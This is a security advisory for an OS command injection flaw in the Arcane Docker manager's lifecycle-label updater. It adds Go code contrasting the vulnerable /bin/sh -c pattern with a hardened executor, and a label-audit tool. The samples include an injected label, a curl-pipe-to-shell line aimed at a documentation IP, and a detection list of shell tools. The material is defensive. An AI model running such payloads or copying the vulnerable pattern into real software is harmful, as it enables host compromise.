CVE-2026-23520: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in getarcaneapp arcane
CVE-2026-23520 is a critical OS command injection vulnerability in Arcane versions prior to 1.13.0, a tool for modern Docker management. The flaw exists in the updater service, which executes lifecycle label commands without sanitization, allowing authenticated users to inject arbitrary shell commands. An attacker can create a malicious project with crafted lifecycle labels that execute commands when an administrator triggers a container update. This vulnerability affects confidentiality, integrity, and availability, as arbitrary code execution can lead to full system compromise. It requires authenticated user access but not administrator privileges, and user interaction is needed only because an admin must initiate the update. The vulnerability is fixed in version 1.13.0.
AI Analysis
Technical Summary
CVE-2026-23520 is an OS command injection vulnerability classified under CWE-78 affecting Arcane, a Docker management tool, in versions prior to 1.13.0. The vulnerability arises from Arcane's updater service supporting lifecycle labels (com.getarcaneapp.arcane.lifecycle.pre-update and com.getarcaneapp.arcane.lifecycle.post-update) that allow execution of shell commands before or after container updates. These label values are passed directly to /bin/sh -c without any sanitization or validation, enabling command injection. Any authenticated user, not limited to administrators, can create projects via the API and specify these lifecycle labels with malicious commands. When an administrator triggers a container update, either manually or through scheduled checks, Arcane executes the malicious command inside the container context. This can lead to arbitrary code execution with the privileges of the updater service, potentially compromising the host system and container environments. The vulnerability has a CVSS v3.1 score of 9.1 (critical), reflecting its high impact on confidentiality, integrity, and availability, ease of exploitation with low attack complexity, and the requirement for low privileges but some user interaction (admin-triggered update). No known exploits are reported in the wild yet. The issue is resolved in Arcane version 1.13.0 by properly sanitizing or removing the unsafe command execution mechanism.
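The sink the summary describes, and one way to close it, as an added illustration in Go (Arcane's backend language). This is not Arcane's code and not the 1.13.0 fix; it reproduces the pattern of handing a label value to /bin/sh -c and contrasts it with a policy-gated executor. The Project type, its CreatorRole field, the HookPolicy allowlist and the sample labels are assumptions constructed for the example; the two label keys are the ones named in the advisory.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"os/exec"
	"strings"
	"time"
)

// Lifecycle label keys named in the advisory.
const (
	LabelPreUpdate  = "com.getarcaneapp.arcane.lifecycle.pre-update"
	LabelPostUpdate = "com.getarcaneapp.arcane.lifecycle.post-update"
)

// Project is a hypothetical stand-in for the updater's view of a project:
// the container labels and the role of the user who created it (assumed field).
type Project struct {
	Name        string
	Labels      map[string]string
	CreatorRole string // "admin" or "user"
}

// runHookVulnerable reproduces the pattern the advisory describes: the raw
// label value is passed to /bin/sh -c, so whoever controls the label
// controls the command line. Shown only as the anti-pattern; never use it.
func runHookVulnerable(p Project, key string) error {
	cmd, ok := p.Labels[key]
	if !ok {
		return nil
	}
	return exec.Command("/bin/sh", "-c", cmd).Run()
}

// HookPolicy is an illustrative hardening (not the project's fix): hooks are
// honoured only for projects created by an administrator, the label is split
// into argv without a shell, and argv[0] must be on an operator allowlist.
type HookPolicy struct {
	AllowedBinaries map[string]bool
	Timeout         time.Duration
}

var (
	ErrUntrustedCreator = errors.New("lifecycle hook ignored: project not created by an admin")
	ErrShellSyntax      = errors.New("lifecycle hook rejected: shell metacharacters in label")
	ErrBinaryNotAllowed = errors.New("lifecycle hook rejected: binary not on allowlist")
)

// BuildHookArgv validates the label and returns the argv to execute directly.
// A nil argv with a nil error means no hook is configured.
func (pol HookPolicy) BuildHookArgv(p Project, key string) ([]string, error) {
	raw, ok := p.Labels[key]
	if !ok || strings.TrimSpace(raw) == "" {
		return nil, nil
	}
	if p.CreatorRole != "admin" {
		return nil, ErrUntrustedCreator
	}
	// Characters that only mean something to a shell are rejected, not
	// "cleaned": the value is treated as an argv, never as a script.
	if strings.ContainsAny(raw, ";&|`$<>(){}\n\\'\"") {
		return nil, ErrShellSyntax
	}
	argv := strings.Fields(raw)
	if !pol.AllowedBinaries[argv[0]] {
		return nil, ErrBinaryNotAllowed
	}
	return argv, nil
}

// Run executes an approved hook with a timeout and without any shell.
func (pol HookPolicy) Run(ctx context.Context, p Project, key string) error {
	argv, err := pol.BuildHookArgv(p, key)
	if err != nil || argv == nil {
		return err
	}
	ctx, cancel := context.WithTimeout(ctx, pol.Timeout)
	defer cancel()
	return exec.CommandContext(ctx, argv[0], argv[1:]...).Run()
}

func main() {
	pol := HookPolicy{AllowedBinaries: map[string]bool{"/usr/local/bin/backup": true}, Timeout: 30 * time.Second}

	// Constructed: a low-privileged user's project carrying a crafted label.
	malicious := Project{Name: "evil", CreatorRole: "user",
		Labels: map[string]string{LabelPreUpdate: "echo hi; touch /tmp/pwned"}}
	_, err := pol.BuildHookArgv(malicious, LabelPreUpdate)
	fmt.Println("malicious label:", err)

	// Constructed: an admin-authored hook that passes the policy.
	benign := Project{Name: "db", CreatorRole: "admin",
		Labels: map[string]string{LabelPostUpdate: "/usr/local/bin/backup --pre"}}
	argv, err := pol.BuildHookArgv(benign, LabelPostUpdate)
	fmt.Println("benign label:", argv, err)
}
```

The role check is the part that matters for this CVE: the label is attacker-controlled input that an administrator's action later executes, so the trust decision has to be made on who set the label, not on the string itself. The metacharacter filter and allowlist only limit what an admin-authored hook can do.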
Potential Impact
For European organizations, this vulnerability poses a significant risk especially to those relying on Arcane for Docker container management. Successful exploitation can lead to full system compromise, data breaches, and disruption of containerized services, impacting business continuity and data confidentiality. Since any authenticated user can inject commands, insider threats or compromised user accounts could be leveraged to escalate privileges and execute arbitrary commands. This could result in unauthorized access to sensitive data, deployment of malware or ransomware, and disruption of critical infrastructure. Organizations in sectors with high container adoption such as finance, telecommunications, and critical infrastructure are particularly vulnerable. The vulnerability also increases the attack surface in multi-tenant environments where project creation is accessible to multiple users. The requirement for administrator interaction to trigger updates means that operational procedures and update policies could influence risk exposure.
Mitigation Recommendations
1. Upgrade Arcane to version 1.13.0 or later immediately to apply the official fix.
2. Restrict project creation permissions to trusted users only, minimizing the risk of malicious lifecycle label injection.
3. Implement strict access controls and monitoring on the Arcane API to detect unauthorized project creations or suspicious lifecycle label usage.
4. Audit and review lifecycle label configurations regularly to ensure no unauthorized commands are present.
5. Limit the privileges of the updater service and container update processes to the minimum necessary to reduce impact if exploited.
6. Establish operational procedures requiring verification before triggering container updates, especially in production environments.
7. Employ runtime security tools to monitor container and host behavior for anomalous command executions.
8. Educate administrators about the risk and signs of exploitation related to lifecycle label abuse.
9. Consider network segmentation to isolate container management services from general user networks.
10. Maintain up-to-date backups and incident response plans to mitigate potential damage from exploitation.
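Recommendation 4 (audit lifecycle labels) can be scripted against `docker inspect` output. The following Go program is an added example, not part of Arcane or of this advisory: it parses the JSON that `docker inspect` emits, reports every container carrying a `com.getarcaneapp.arcane.lifecycle.*` label, and raises the severity when the value contains shell syntax or download-and-run patterns. The embedded sample is constructed data in the shape of `docker inspect` output, and the indicator list is a heuristic chosen for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"os"
	"strings"
)

// inspected mirrors the subset of `docker inspect` output this audit needs.
type inspected struct {
	Name   string `json:"Name"`
	Config struct {
		Labels map[string]string `json:"Labels"`
	} `json:"Config"`
}

// Prefix shared by the two lifecycle labels named in the advisory.
const lifecyclePrefix = "com.getarcaneapp.arcane.lifecycle."

// Finding is one lifecycle hook found on a container.
type Finding struct {
	Container string
	Label     string
	Value     string
	Severity  string // "info" for any hook present, "high" when the value looks like a shell payload
}

// shellIndicators are substrings that only make sense when the value is run
// through a shell, or that fetch and execute remote content (heuristic).
var shellIndicators = []string{";", "&&", "||", "|", "`", "$(", ">", "<", "curl ", "wget ", "bash -i", "/dev/tcp", "base64"}

// AuditInspectOutput parses `docker inspect` JSON and returns one Finding per
// lifecycle label. Containers without such labels are not reported.
func AuditInspectOutput(raw []byte) ([]Finding, error) {
	var containers []inspected
	if err := json.Unmarshal(raw, &containers); err != nil {
		return nil, fmt.Errorf("parsing docker inspect output: %w", err)
	}
	var findings []Finding
	for _, c := range containers {
		for k, v := range c.Config.Labels {
			if !strings.HasPrefix(k, lifecyclePrefix) {
				continue
			}
			sev := "info"
			for _, ind := range shellIndicators {
				if strings.Contains(v, ind) {
					sev = "high"
					break
				}
			}
			findings = append(findings, Finding{
				Container: strings.TrimPrefix(c.Name, "/"),
				Label:     k,
				Value:     v,
				Severity:  sev,
			})
		}
	}
	return findings, nil
}

// sampleInspect is constructed data shaped like `docker inspect $(docker ps -aq)`.
// 203.0.113.9 is a documentation address (TEST-NET-3).
const sampleInspect = `[
  {"Name": "/web", "Config": {"Labels": {"com.getarcaneapp.arcane.lifecycle.pre-update": "/usr/local/bin/drain --wait"}}},
  {"Name": "/db", "Config": {"Labels": {"com.getarcaneapp.arcane.lifecycle.post-update": "echo done; curl -s http://203.0.113.9/x | sh", "maintainer": "ops"}}},
  {"Name": "/cache", "Config": {"Labels": {"maintainer": "ops"}}}
]`

func main() {
	// With "-" as the first argument, audit real output piped on stdin;
	// otherwise run against the constructed sample.
	data := []byte(sampleInspect)
	if len(os.Args) > 1 && os.Args[1] == "-" {
		b, err := io.ReadAll(os.Stdin)
		if err != nil {
			fmt.Fprintln(os.Stderr, err)
			os.Exit(1)
		}
		data = b
	}
	findings, err := AuditInspectOutput(data)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	for _, f := range findings {
		fmt.Printf("[%s] %s %s=%q\n", f.Severity, f.Container, f.Label, f.Value)
	}
}
```

Against a live host, run `docker inspect $(docker ps -aq) | go run audit.go -` on the Docker host Arcane manages. Every "info" finding deserves a look as well: on a pre-1.13.0 install, any lifecycle hook set by a non-admin is a problem regardless of what the value contains.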
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Denmark, Belgium, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-01-13T18:22:43.980Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 6969476c1ab3796b1034af8c
Added to database: 1/15/2026, 8:00:44 PM
Last enriched: 1/22/2026, 9:40:53 PM
Last updated: 2/6/2026, 11:12:11 AM
Related Threats
CVE-2026-2015: Improper Authorization in Portabilis i-Educar (Medium)
CVE-2026-2014: SQL Injection in itsourcecode Student Management System (Medium)
CVE-2026-2013: SQL Injection in itsourcecode Student Management System (Medium)
CVE-2026-24928: CWE-680 Integer Overflow to Buffer Overflow in Huawei HarmonyOS (Medium)
CVE-2026-24927: CWE-416 Use After Free in Huawei HarmonyOS (Medium)